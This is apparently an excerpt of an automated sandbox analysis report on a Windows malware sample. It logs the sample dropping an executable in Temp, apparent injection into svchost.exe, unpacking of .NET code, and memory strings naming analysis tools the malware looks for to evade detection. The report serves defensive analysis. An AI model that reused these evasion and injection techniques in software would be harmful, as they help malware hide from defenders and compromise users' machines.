                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2268,i,5510077771295521084,16887318193835122757,262144 /prefetch:8
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr1078.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/72f3a0b3"
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --explicitly-allowed-ports=8000 --disable-gpu --new-window --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate http://127.0.0.1:8000/254d3199/72f3a0b3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2036,i,6499210504756038714,13868593157593711186,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5092 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=2952 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window /prefetch:5
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4444 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:8
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: shfolder.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: riched20.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: usp10.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: msls31.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: slc.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wudfplatform.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: mswsock.dll
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: HI6VIJERUn.exeStatic file information: File size 1374325 > 1048576
                      Source: HI6VIJERUn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: kernel32.pdbUGP source: Hop.com, 0000000E.00000003.1669311626.00000243686E0000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669190239.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675738205.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675827080.000001C2783A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernelbase.pdbUGP source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: Hop.com, 0000000E.00000003.1668539645.0000024368810000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1668374308.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000F.00000003.1675250294.000001C2784D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: Hop.com, 0000000E.00000003.1668539645.0000024368810000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1668374308.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675250294.000001C2784D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdb source: Hop.com, 0000000E.00000003.1669311626.00000243686E0000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669190239.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675738205.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675827080.000001C2783A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdb source: wmplayer.exe, 00000023.00000003.2116953373.0000021AB3300000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2116916350.0000021AB32A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000023.00000003.2116953373.0000021AB3300000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2116916350.0000021AB32A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernelbase.pdb source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 15.2.svchost.exe.1c27633a300.2.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 15.2.svchost.exe.1c27633a300.2.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 15.2.svchost.exe.1c276308380.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 15.2.svchost.exe.1c276308380.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                      Source: HI6VIJERUn.exeStatic PE information: real checksum: 0x15799c should be: 0x154382
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 10_3_00000183202EF679 pushfd ; retf 10_3_00000183202EFF8A
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4676AD push rdi; ret 12_2_00007FF68C4676B4
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C467149 push rdi; ret 12_2_00007FF68C467152
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_3_0000024366312924 push rsp; ret 14_3_0000024366312925
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665ED0E0 pushad ; retf 14_2_00000243665ED0E1
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E3CC4 push E8000098h; ret 14_2_00000243665E3CC9
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F6B2D push ss; iretd 14_2_00000243668EB197
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665FA558 push ds; retf 14_2_00000243665FA56F
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F7BFE push esi; ret 14_2_00000243665F7BFF
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665FD61F push ebp; iretd 14_2_00000243665FD620
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665FDAC3 pushad ; iretd 14_2_0000024366924EAB
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F94BE push esi; ret 14_2_00000243665F94C2
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F76D1 push ecx; ret 14_2_00000243665F76F8
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F5E68 push ebp; retf 14_2_00000243665F5E8C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F5E8D push ebp; retf 14_2_00000243665F5E8C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783122DA push rsp; retf 15_3_000001C2783122DB
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783283CD push rbp; retf 15_3_000001C2783283CE
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278327E99 push rax; iretd 15_3_000001C278327E9A
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760708B2 push cs; ret 15_3_000001C276070953
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760708F4 push cs; ret 15_3_000001C276070953
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760755CE push eax; retf 15_3_000001C2760755D1
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760753CE push esi; ret 15_3_000001C2760753D5
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760751EE push edi; ret 15_3_000001C2760751F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760752E0 pushad ; iretd 15_3_000001C2760752E6
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640D0E0 pushad ; retf 15_2_000001C27640D0E1
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276403CC4 push E8000098h; ret 15_2_000001C276403CC9
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641A7F0 push edx; retf 15_2_000001C27641A7F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641ADA2 pushad ; iretd 15_2_000001C27641ADA3
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641A5B3 push ebp; iretd 15_2_000001C27641A5B4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276419473 pushad ; ret 15_2_000001C27641947D
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276416572 push esp; retf 15_2_000001C2764165D9

                      Persistence and Installation Behavior

                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\407310\Hop.com
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile created: C:\Users\user\AppData\Local\Temp\Buffer
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C454364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00007FF68C454364
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_15-3430
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
                      Source: Hop.com, 0000000E.00000003.1670942879.000002436638F000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
                      Source: Hop.com, 0000000E.00000003.1670942879.000002436638F000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSLASSO.EXEWIRESHARK.EXEFIDDLER EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDR#8
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDN
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HACKER.EXEFILEMON.EXEREGMON.EXEWIND
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831F5A0 rdtscp15_3_000001C27831F5A0
                      Source: C:\Windows\System32\dllhost.exeCode function: GetAdaptersInfo,36_2_000001F269C72B70
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-3862
                      Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_15-3448
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C472DE0 FindFirstFileExW,12_2_00007FF68C472DE0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4ACE3C GetFileAttributesW,FindFirstFileW,FindClose,12_2_00007FF68C4ACE3C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB0B80 calloc,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,15_3_00007DF426AB0B80
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E5BC8 GetLogicalDriveStringsW,QueryDosDeviceW,14_2_00000243665E5BC8
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C435C44 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,12_2_00007FF68C435C44
